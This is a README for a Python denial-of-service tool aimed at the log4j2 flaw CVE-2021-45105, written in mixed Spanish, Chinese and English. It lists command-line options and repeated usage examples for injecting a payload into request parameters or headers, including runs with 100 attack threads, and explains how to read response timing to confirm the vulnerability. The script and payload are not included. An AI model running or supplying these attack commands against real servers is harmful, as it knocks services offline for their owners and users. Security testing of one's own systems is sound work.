
exploit DoS de log4j2, exploit de CVE-2021-45105, PoC de denegación de servicio
autor: 我超怕的
blog: https://www.cnblogs.com/iAmSoScArEd/
github: https://github.com/iAmSOScArEd/
fecha: 2021-12-20
log4j2 dos exploit
script de explotación de log4j2 dos
CVE-2021-45105 Exploit
Script de explotación de CVE-2021-45105
Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
-u,--url attack target
-m,--method http method, only get and post. default is get.
-d,--data get or post params, json format like:{\"username\":\"\"}
-H,--header request header, json format like:{\"user-agent\":\"\"}
-l,--loop payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread attack thread. default is 0, just request once.
usage:
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500
-l (--loop) el valor debe configurarse por separado según el escenario; no es que cuanto más grande, mejor. Si supera la longitud que el servidor web puede aceptar, puede provocar que la detección de ataques falle y no tenga efecto de ataque.
Formato de salida:
[+] normal time:0.11111
[+] attack time:2.00000
si attack time -normal time>1 o algo así, puede que exista una vulnerabilidad; se puede usar el parámetro -t para configurar el hilo de ataque.
Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
-u,--url 攻击目标
-m,--method 默认为get,http方式,仅支持get和post
-d,--data get或post请求参数,json格式,如:{\"username\":\"\"}
-H,--header 请求头, json格式, 如:{\"user-agent\":\"\"}
-l,--loop 默认为100,payload循环长度,根据参数在不同的位置,设置不同的数值,如请求头最大允许长度、get最大长度、post最大长度
-t,--thread 默认为0,表示仅请求一次。攻击线程。
常见用法:
# 默认get,100个payload循环,攻击探测一次,在username参数中添加攻击payload
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
# 默认get,设置500个payload循环,发起100个攻击线程,在username参数中添加攻击payload
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
# 指定POST,设置500个payload循环,攻击探测一次,在username参数中添加攻击payload
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
# 指定POST,设置500个payload循环,发起100个攻击线程,在user-agent请求头中添加攻击payload
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
# 指定POST,设置500个payload循环,攻击探测一次,在username参数和user-agent请求头中添加攻击payload
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500
-l (--loop) el valor debe configurarse por separado según el escenario; no es que cuanto más grande, mejor. Si supera la longitud que el servidor web puede aceptar, puede provocar que la detección de ataques falle y no tenga efecto de ataque.
Formato de salida:
[+] normal time:0.11111
[+] attack time:2.00000
Si el retraso de attack time es muy grande, significa que la vulnerabilidad existe; se puede usar el parámetro -t para configurar el hilo de ataque.
No lo utilice con fines ilegales; solo para aprendizaje y referencia. Cualquier acto ilegal no tiene relación conmigo.
(Inglés chapucero, sin traducción, léalo como pueda.)
Por: 我超怕的